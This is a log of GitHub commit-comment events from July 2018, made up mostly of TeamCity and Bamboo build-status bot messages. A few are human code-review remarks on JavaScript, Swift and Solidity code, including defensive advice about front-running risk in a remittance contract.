{"id":"7924872205","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611060,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:31:41Z","updated_at":"2018-07-05T18:31:41Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 192](https://teamcity.otenv.com/viewLog.html?buildId=8869359&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:31:41Z"}
{"id":"7924872237","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611061,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:31:41Z","updated_at":"2018-07-05T18:31:41Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 192](https://teamcity.otenv.com/viewLog.html?buildId=8869359&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:00"}},"created_at":"2018-07-05T18:31:41Z"}
{"id":"7924872304","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611062,"position":null,"line":null,"path":null,"commit_id":"e14f66d8e23120c4afd27ff771368548859a514a","created_at":"2018-07-05T18:31:42Z","updated_at":"2018-07-05T18:31:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:31:42Z"}
{"id":"7924872307","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611063,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:31:42Z","updated_at":"2018-07-05T18:31:42Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 193](https://teamcity.otenv.com/viewLog.html?buildId=8869529&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:31:42Z"}
{"id":"7924872331","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611064,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:31:43Z","updated_at":"2018-07-05T18:31:43Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 193](https://teamcity.otenv.com/viewLog.html?buildId=8869529&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-05T18:31:43Z"}
{"id":"7924872510","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611065,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:31:45Z","updated_at":"2018-07-05T18:31:45Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 194](https://teamcity.otenv.com/viewLog.html?buildId=8869530&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:31:45Z"}
{"id":"7924872570","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611067,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:31:46Z","updated_at":"2018-07-05T18:31:46Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 194](https://teamcity.otenv.com/viewLog.html?buildId=8869530&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:02"}},"created_at":"2018-07-05T18:31:46Z"}
{"id":"7924872638","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611068,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:31:46Z","updated_at":"2018-07-05T18:31:46Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 195](https://teamcity.otenv.com/viewLog.html?buildId=8869531&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:31:46Z"}
{"id":"7924872677","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29611070,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-05T18:31:47Z","updated_at":"2018-07-05T18:31:47Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 195](https://teamcity.otenv.com/viewLog.html?buildId=8869531&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-05T18:31:47Z"}
{"id":"7924872681","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611071,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:31:47Z","updated_at":"2018-07-05T18:31:47Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 225](https://teamcity.otenv.com/viewLog.html?buildId=8869361&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:31:47Z"}
{"id":"7924872721","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611072,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:31:48Z","updated_at":"2018-07-05T18:31:48Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 225](https://teamcity.otenv.com/viewLog.html?buildId=8869361&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:00"}},"created_at":"2018-07-05T18:31:48Z"}
{"id":"7924872795","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29611073,"position":57,"line":57,"path":"contracts/Remittance.sol","commit_id":"003f778f66e45b8fcf6664299362ea35cf6967fd","created_at":"2018-07-05T18:31:48Z","updated_at":"2018-07-05T18:31:48Z","author_association":"NONE","body":"It's good that you include the msg.sender in your hash here or all the money would be stolen. Can you imagine how all the passwords will \"leak\" so everyone knows what they are, before this transaction is mined? Can you imagine how a hacker would use that information to steal (err ... use the contract to withdraw) all the money?"}},"created_at":"2018-07-05T18:31:48Z"}
{"id":"7924872827","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611074,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:31:49Z","updated_at":"2018-07-05T18:31:49Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 226](https://teamcity.otenv.com/viewLog.html?buildId=8869532&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:31:49Z"}
{"id":"7924872858","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611075,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:31:49Z","updated_at":"2018-07-05T18:31:49Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 226](https://teamcity.otenv.com/viewLog.html?buildId=8869532&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-05T18:31:49Z"}
{"id":"7924872982","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611076,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:31:51Z","updated_at":"2018-07-05T18:31:51Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 227](https://teamcity.otenv.com/viewLog.html?buildId=8869533&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:31:51Z"}
{"id":"7924873003","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611077,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:31:51Z","updated_at":"2018-07-05T18:31:51Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 227](https://teamcity.otenv.com/viewLog.html?buildId=8869533&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-05T18:31:51Z"}
{"id":"7924873102","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611078,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:31:53Z","updated_at":"2018-07-05T18:31:53Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 228](https://teamcity.otenv.com/viewLog.html?buildId=8869534&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:31:53Z"}
{"id":"7924873133","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-metrics"},"payload":{"comment":{"id":29611079,"position":null,"line":null,"path":null,"commit_id":"f687d9dc247e30fec84259de3e4a89753cb8c6ba","created_at":"2018-07-05T18:31:53Z","updated_at":"2018-07-05T18:31:53Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-metrics :: BuildTest [Build 228](https://teamcity.otenv.com/viewLog.html?buildId=8869534&buildTypeId=ArchitectureTeam_JavaPlatform_OtjMetrics_BuildTest) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-05T18:31:53Z"}
{"id":"7924874472","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611106,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-05T18:32:11Z","updated_at":"2018-07-05T18:32:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:32:11Z"}
{"id":"7924874787","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"iamnurs/recipes"},"payload":{"comment":{"id":29611115,"position":59,"line":59,"path":"components/RecipeList.tsx","commit_id":"f4bc8213349f0839f159d449358badde0093ee62","created_at":"2018-07-05T18:32:15Z","updated_at":"2018-07-05T18:32:15Z","author_association":"NONE","body":"В JavaScript, если название переменной и название ключа объекта совпадают, можно писать так:\r\n\r\n`{ recipe }` вместо `{ recipe: recipe }`"}},"created_at":"2018-07-05T18:32:15Z"}
{"id":"7924876080","type":"CommitCommentEvent","actor":{"login":"legnaleurc"},"repo":{"name":"adsbypasser/adsbypasser"},"payload":{"comment":{"id":29611143,"position":null,"line":null,"path":null,"commit_id":"a00ff4f6bb6b73fbbeda52ada1a95c51faef0056","created_at":"2018-07-05T18:32:31Z","updated_at":"2018-07-05T18:32:31Z","author_association":"MEMBER","body":"`/^(adshorte|adsrt)\\.com$/` and `/^cut4link\\.com$/` had disappeared, is this intentional?"}},"created_at":"2018-07-05T18:32:31Z"}
{"id":"7924876704","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611159,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-05T18:32:40Z","updated_at":"2018-07-05T18:32:40Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:32:40Z"}
{"id":"7924876899","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29611162,"position":69,"line":69,"path":"contracts/Remittance.sol","commit_id":"003f778f66e45b8fcf6664299362ea35cf6967fd","created_at":"2018-07-05T18:32:42Z","updated_at":"2018-07-05T18:32:42Z","author_association":"NONE","body":"It would be much better to pause/resume the contract instead of using `selfdestruct`. It is a very extreme instrument with many disadvantages. "}},"created_at":"2018-07-05T18:32:42Z"}
{"id":"7924877849","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611179,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-05T18:32:53Z","updated_at":"2018-07-05T18:32:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:32:53Z"}
{"id":"7924878012","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29611183,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-05T18:32:55Z","updated_at":"2018-07-05T18:32:55Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 43](https://teamcity.otenv.com/viewLog.html?buildId=8869426&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) is now running\n"}},"created_at":"2018-07-05T18:32:55Z"}
{"id":"7924880150","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611197,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-05T18:33:24Z","updated_at":"2018-07-05T18:33:24Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:33:24Z"}
{"id":"7924880797","type":"CommitCommentEvent","actor":{"login":"egilburg"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":29611206,"position":null,"line":null,"path":null,"commit_id":"3138255670a0e6df6080bc942734df93962e66ae","created_at":"2018-07-05T18:33:32Z","updated_at":"2018-07-05T18:33:32Z","author_association":"NONE","body":"@endless-sky this is cool. I wonder if it can be extended to \"leaks\" that deal damage if a ship is caught in the radius, e.g. a corrosive leak that damages hull, or an electric discharge which damages shield. "}},"created_at":"2018-07-05T18:33:32Z"}
{"id":"7924881654","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-filterorder"},"payload":{"comment":{"id":29611218,"position":null,"line":null,"path":null,"commit_id":"2e228a0c50f6175c0f0f26a7dbdee54902c716b1","created_at":"2018-07-05T18:33:44Z","updated_at":"2018-07-05T18:33:44Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-filterorder :: BuildTest [Build 43](https://teamcity.otenv.com/viewLog.html?buildId=8869426&buildTypeId=ArchitectureTeam_JavaPlatform_OtjFilterorder_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 7 Build time: 00:00:49"}},"created_at":"2018-07-05T18:33:44Z"}
{"id":"7924882033","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611228,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-05T18:33:48Z","updated_at":"2018-07-05T18:33:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:33:48Z"}
{"id":"7924882357","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"iamnurs/recipes"},"payload":{"comment":{"id":29611234,"position":78,"line":78,"path":"components/RecipeList.tsx","commit_id":"f4bc8213349f0839f159d449358badde0093ee62","created_at":"2018-07-05T18:33:52Z","updated_at":"2018-07-05T18:33:52Z","author_association":"NONE","body":"Когда тебе нужен просто компонент-контейнер, используй `React.Fragment` вместо `View`.\r\n\r\nhttps://reactjs.org/docs/fragments.html"}},"created_at":"2018-07-05T18:33:52Z"}
{"id":"7924883044","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611251,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-05T18:34:02Z","updated_at":"2018-07-05T18:34:02Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:34:02Z"}
{"id":"7924884968","type":"CommitCommentEvent","actor":{"login":"Globik"},"repo":{"name":"stan1y/servo"},"payload":{"comment":{"id":29611289,"position":null,"line":null,"path":null,"commit_id":"7562df1ba06b7d613336224af3dd608cf70f788e","created_at":"2018-07-05T18:34:26Z","updated_at":"2018-07-05T18:34:26Z","author_association":"NONE","body":"If servo is using postgresql async API?"}},"created_at":"2018-07-05T18:34:26Z"}
{"id":"7924885528","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611304,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-05T18:34:34Z","updated_at":"2018-07-05T18:34:34Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:34:34Z"}
{"id":"7924886394","type":"CommitCommentEvent","actor":{"login":"wbaumann"},"repo":{"name":"EvsenevDev/SmartReceiptsiOS"},"payload":{"comment":{"id":29611321,"position":24,"line":24,"path":"SmartReceipts/Services/Auto Backup/BackupProvider.swift","commit_id":"9de7f59fb1aafc7eb7d65783fc6afeec8f401525","created_at":"2018-07-05T18:34:45Z","updated_at":"2018-07-05T18:34:45Z","author_association":"NONE","body":"Should this be `String?` instead of `String`? I may just be confusing my Kotlin and Swift syntaxes though :)"}},"created_at":"2018-07-05T18:34:45Z"}
{"id":"7924887403","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29611347,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-05T18:34:57Z","updated_at":"2018-07-05T18:34:57Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T18:34:57Z"}
{"id":"7924887910","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29611350,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-05T18:35:04Z","updated_at":"2018-07-05T18:35:04Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 148](https://teamcity.otenv.com/viewLog.html?buildId=8869506&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) is now running\n"}},"created_at":"2018-07-05T18:35:04Z"}
{"id":"7924887930","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29611351,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-05T18:35:04Z","updated_at":"2018-07-05T18:35:04Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 148](https://teamcity.otenv.com/viewLog.html?buildId=8869506&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:00"}},"created_at":"2018-07-05T18:35:04Z"}
{"id":"7924888014","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29611352,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-05T18:35:05Z","updated_at":"2018-07-05T18:35:05Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 149](https://teamcity.otenv.com/viewLog.html?buildId=8869672&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) is now running\n"}},"created_at":"2018-07-05T18:35:05Z"}
{"id":"7924888027","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29611353,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-05T18:35:06Z","updated_at":"2018-07-05T18:35:06Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 149](https://teamcity.otenv.com/viewLog.html?buildId=8869672&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:01"}},"created_at":"2018-07-05T18:35:06Z"}
{"id":"7924888091","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-logging"},"payload":{"comment":{"id":29611354,"position":null,"line":null,"path":null,"commit_id":"888f9dd7d09d60f90f60d978b01ceec03f9c5099","created_at":"2018-07-05T18:35:07Z","updated_at":"2018-07-05T18:35:07Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-logging :: otj-logging [Build 150](https://teamcity.otenv.com/viewLog.html?buildId=8869673&buildTypeId=ArchitectureTeam_JavaPlatform_OtjLogging_OtjLogging) is now running\n"}},"created_at":"2018-07-05T18:35:07Z"}
